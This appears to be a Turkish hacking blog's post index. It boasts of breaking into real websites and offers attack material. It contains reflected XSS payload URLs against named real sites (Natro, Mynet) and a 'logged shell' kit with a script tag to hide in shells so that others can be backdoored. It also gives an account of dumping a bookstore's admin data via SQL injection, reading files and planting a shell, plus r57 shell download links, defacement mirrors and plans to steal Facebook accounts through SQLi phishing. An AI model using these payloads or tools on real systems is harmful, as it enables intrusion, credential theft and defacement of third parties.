0 Blind SQL Injection (Temel)

Merhaba, bu yazıda sizlere MySQL Blind Injection'dan bahsedicem.Normal SQLi bilgilerinize  güvenerek Blind SQLi'de birşeyler yaparım diyorsanız elinize kayda değer birşey geçirecemeyecek, sıkılıp vazgeçeceksiniz.Çünkü Blind SQLi'de sayfada işinize yarayan verileri yazdıramıyorsunuz, her harf için sorgunuzu tekrar düzenlemeniz, bir yandan da aldığınız tepkilere göre ASCII tablosundan yararlanmanız gerekiyor.Yani sabır ve ince işçilik isteyen bir iş.

0 Winrar HTML Injection Açığı [SFX]

Merhaba, bayadır piyasada olan ama yeni farkettiğim (https://milw00rm.net/exploits/8958) şaşırtıcı derecede basit bir açık ama risk düzeyi oldukça yüksek bana göre, ohoo uğraşılsa neler yapılmaz ki bununla :)

Açık 18 Mayıs 2015'de Ehsan Ice tarafından keşfedilmiş ve WinRAR tarafından halen bir yama yayınlanmış değil :) Yani açık winrar'ın bütün sürümlerinde halen bulunuyor !

0 Loglamayı Sevenlere

Artık mail'de atıyor, yakında bulaşıkları da yıkayacak :) [ * ]
Editleyip ben kodladım diyen götverendir : [*,*] :)

0 SQLi Kullanarak URL Phishing Saldırıları

Merhaba bu yazıda alışılmış SQLi saldırılarının (Login bilgilerini alıp siteyi uçurmak gibi... ) aksine, SQLi barındıran sitenin URL adresini kendi lehimize göre nasıl manipule ederiz bu konuya değinicem.

"SQL Injection'ı buldun da fantezimi yapıyon ?" diye sorabilirsiniz...Örneğin; facebookmarket.com gibi güzel, kaymak gibi bi' domain buldunuz tabi sitede SQLi açığı mevcut olmalı! Bu siteye çakarsam 1 taşla 1 kuş vurmuş olurum, ama az sonra anlatacaklarımı bu sitede uygularsam çalamayacağım facebook account'u kalmaz.Başlayalım;

Muhtemel Senaryolar :

[1] SQLi açığı bulunan bir hedef bulmalıyız.

[2] Hedefe HTML Form enjekte edebiliriz. (İdeal & Basit)

[3] Hedefe iFrame enjekte edebiliriz.

[4] Kurbanı açık bulunan site üzerinden kendi tuzak yönlendirebiliriz.

[5] XSS injection yapabiliriz.

Kendinize bir hedef bulduğunuzu varsayarak 1. adımı geçiyorum.

9 Loglu Shell Scripti (Şifre Korumalı)

Blog panelimde en çok hit alan yazıların başında "Haydi ! Loglu Shell Yapalım :)" yazımın olduğunu görünce oradaki bilgilerin biraz tırt olduğunu farkettim...yani kaldır at bi boka yaramaz...o yazıyı hangi kafayla yazdım hatırlamıyorum ama bayadır düzenlemeyi düşünüyodum lakin üşengeçlik işte :) Neyse üşengeçliğimin aksine gecenin bi yarısı üşenmedim sırf sizler birbirinizi rahat rahat kekleyin diye şifre korumalı loglu shell yazdım :) en azından piyasadaki kıytırık logger dalgalarının aksine şık & güvenli oldu :) kullanım klavuzu bile var !!!

Aslında bi ara kafayı biraz daha kırıp kullanıcı girişini & logları mySql e bağlayacaktım ama kullanım kolaylığı açısından biraz zor olacaktı...yani düşünsenize zor zahmet bi server a sızdınız gizli saklı bu scripti orada kullanmak istiyorsunuz bide tutup phpMyadmin 'e girip veritabanı mı oluşturacaksınız pehh!?! :P tabi siz sırf Loglu Shell işi için ayrı host - domain alacaksanız o zaman başka, iletişime geçin karşılıklı güzelleşiriz ;)

Login paneli :) amerikan filmlerindeki gibi oldu :)

Logları buradan gözlemleyebilirsiniz.fwrite ila yazım yaptığım için log dosyası şişebilir herhangi bi editörde(notepad vs.) govde.php yi açarak içeriğini silebilirsiniz.

Admin ayarlarını ayarlar.php den yukarıdaki gibi düzenleyebilirsiniz.

Shell 'e gizlenecek js kodu (şifrelemenizi tavsiye ederim) :

<script src=http://localhost/log/log.js></script>

• Dosyaları buradan indirebilirsiniz.
• Rar Pass : uslub3y

Yorumlarınızı bekliyorum...Hayırlı işler ! ;)

0 "Hak Yerini Bulana Kadar HACK" ?

Son zamanlarda gündemde herkes tarafından bir kısım halkın üç buçuk atmasına sebebiyet veren, bir kısım tarafından ise halk kahramanı seçilen RedHack hack grubu hakkında bi kaç atıfta bulunucam.Bu yazıyı yazmamdaki amaç Bilecik belediyesine ait sitenin (bilecik.bel.tr) 1-2 gün önce bu grup tarafından hacklenişidir...(bknz.)

Aslına bakarsanız sitedeki açığı yaklaşık 1 sene kadar öncesinden beri bilmeme ve yetkili diye para ödedikleri kişilere bildirmeme rağmen deyim yerindeyse s*klenmedim ve ne haliniz varsa görün dedim ve görünüşe bakılırsa görmüşler :) basit bir SqL injection açığıyla görüldüğü gibi sitenin veritabanına oradanda maalesef can alıcı noktaya, panele ulaşabiliyordu :

Panel:

0 Sezgisel Hack ! (Sesli Eğitim Videosu)

Merhaba muhterem takipçilerim bu tür paylaşım yapmayalı uzun bir süre oldu sanırım...Bu uzun süre zarfında da anladım ki sizlerin varlığını ortaya çıkarmak için illegal yolda birşeyler yapmak gerekiyor ekşın şart yani ama yapmayacam :) yani aslında yaptım...Yaptım evet ama illegal değil uyarı maiyetinde bişey oldu galiba(Bknz.) meraktan ağzınızın sulandığını biliyorum muhteremler yaklaşın :)

6 MySQL Injection Show :)

Merhaba arkadaşlar uzun bir aradan sonra güzel bir video ile tekrar karşınızdayım :)

SQL Injection'a yeni başladığım günden bu yana geçen sürede anladım ki bir siteye SQL Injection uygulamak gerçekten bir sanat ve çok zevkli bir iş :) Eğer içinizde biraz keşfetme ve hırs duygusu varsa çok büyük işler yapabilirsiniz...

Videoyu biraz açıklayacak olursam, online kitap satışı yapan bir siteyi hedef aldım...Açıkçası başta siteye shell sokmak aklımdan geçmedi, ilk önce mysql injection uygulayarak tüm adminlerin bilgilerini aldım tabi bunun yanında şansımın yaver gitmesiyle birçok e-mail hatta bir host+domain bile elime geçti :) Ama en küçük bir veri kaybına yada hesaba el koyma gibi birşey yapmadım.Benimkisi sadece yapabileceklerimi görme egosu galiba...

Aradan kısa bir zaman geçince aklıma birşey takıldı milw0rm'de "Rooting a linux box via MySQL Injection" adlı bir video izlemiştim çok ilgimi çeken bir videoydu videodaki yönteme ara ara göz gezdirdiğim SQL injection cheat sheet yazılarından aşinaydım...Ama herhangi bir siteye uygulamak açıkçası nasip olmamıştı :) Neden olmasın diyerek load_file() fonksiyonunu kullandım ve başarıyla çalıştı...Daha sonra önem taşıyan bazı site dosyalarını okudum...Ardından basit bir rfi açığı yaratarak işi bitirdim...Serverda yeni bir kernel kullandıkları için uygun local root exploiti bulamadım dolayısıyla root olamadım...Zaten 2 site barınıyordu işte onlar :P

http://www.zone-h.org/mirror/id/8776609
http://www.zone-h.org/mirror/id/8788915

• Videodaki Araçlar:

> r57 Shell : http://kopru6.co.cc/r57.txt

> text2hex : indir (36 Kb)

• Video Download:

> İndir (11 .9 Mb)

Lütfen Kaynak Göstererek Kullanınız! /UsluBey

0 Natro Web Hosting XSS

Natro Web Hosting Firması sitesinin domain check kısmında xss açığı olduğunu farkettim xssed.com'a submit ettim onaylanmasını bekliyorum...
İşte bulduğum açık:

http://whois.natro.com/index.php?DomainName="><script>alert(/XSSeD BY USLUBEY/)</script>

Sitede daha öncedende bulunmuş xss açıkları:
http://www.xssed.com/mirror/30330/
http://www.xssed.com/mirror/826/

2 Site Üzerinden RFI Tespiti

Site kodlarını masaya almadan online olarak rfi açıklarını yakalayabilirsiniz...Tanımlanmamış başıboş çağırılan variable'lar bu gibi basit güvenlik açıklarına sebeptir...

Videodada bu basit hatanın sitenin güvenliğini ne boyutta etkilediğini görüceksiniz...

Videoyu izlemek için buraya tıklayın.

5 Text To Hex Conversion Tool

Arada böyle şirin programlar yapmak hoşuma gidiyor :) Programın ne işe yaradığını sanırım anladınız...

Visual basic kullanarak hazırladım, SQL injection saldırılarında hexlemeniz gereken stringlerinizi artık bu programla hexlerseniz sevinirim ^^

Programı buradan indirebilirsiniz.

3 Webfırsat Emlak Yazılımı v1.0 SQL Injection Vulnerability

Rastgele bulduğum 200 liralık bir script pehh =) Sanırım pek kullanıcısıda yok...

Açığı görmek için buraya tıklayınız.

0 Mynet XSS

http://haber.mynet.com/detail_news/?type="><script>alert("XSS3D By
UsluBey")</script>&id=N182493&date=24Ekim2008



Mail hack için kullanılabileceğini sanmıyorum fakat phishing için kullanılabilir...

13 SQL Injection vs. r57

Merhaba bilmiyorum blogumu takip eden birileri varmı ilginçtir ki benim izleyicilerim sessiz kişiler neden derseniz.Videolarımı izlerler, kaynaklarımı okurlar sonrasında msn'mi ekler diyeceklerini msnden derler yani blogumu hiç kullanmazlar her neyse...

Uzun bi süredir video çekmiyordum çekmişken faydalı olucak bişi çekiyim dedim.Videoyu anlamanız için gereken yerlerde gereken açıklamaları yapmaya çalıştım...

Videoyu bilgisayarınıza indirmek için tıklayınız.

0 XSS Açıklarının Kullanımı

XSS açıklarının bulunuşu videomun arkasından bulunan xss açıklarının nasıl kullanılacığını gösteren bir tutorial daha...

Konu: XSS Açıklarının Kullanımı
Video Formatı: Flash
Video: İzlemek İçin Tıklayın!

2 XSS Açıklarının Bulunuşu

Arşivimde bulunan XSS açıklarının nasıl bulunduğuna dair güzel bir videoyu paylaşmak istedim.
Konu: XSS Açıklarının Bulunuşu

Video Formatı: Flash
Video: İzlemek İçin Tıklayın!

Bir sonraki XSS konusuda videolu, onun konusu "XSS Açıklarının Nasıl Kullanıldığı" olucak gözlerimden uyku aktığı ve monütörü bulanık görmeye başladığımdan dolayı onu yarın paylaşıcam :)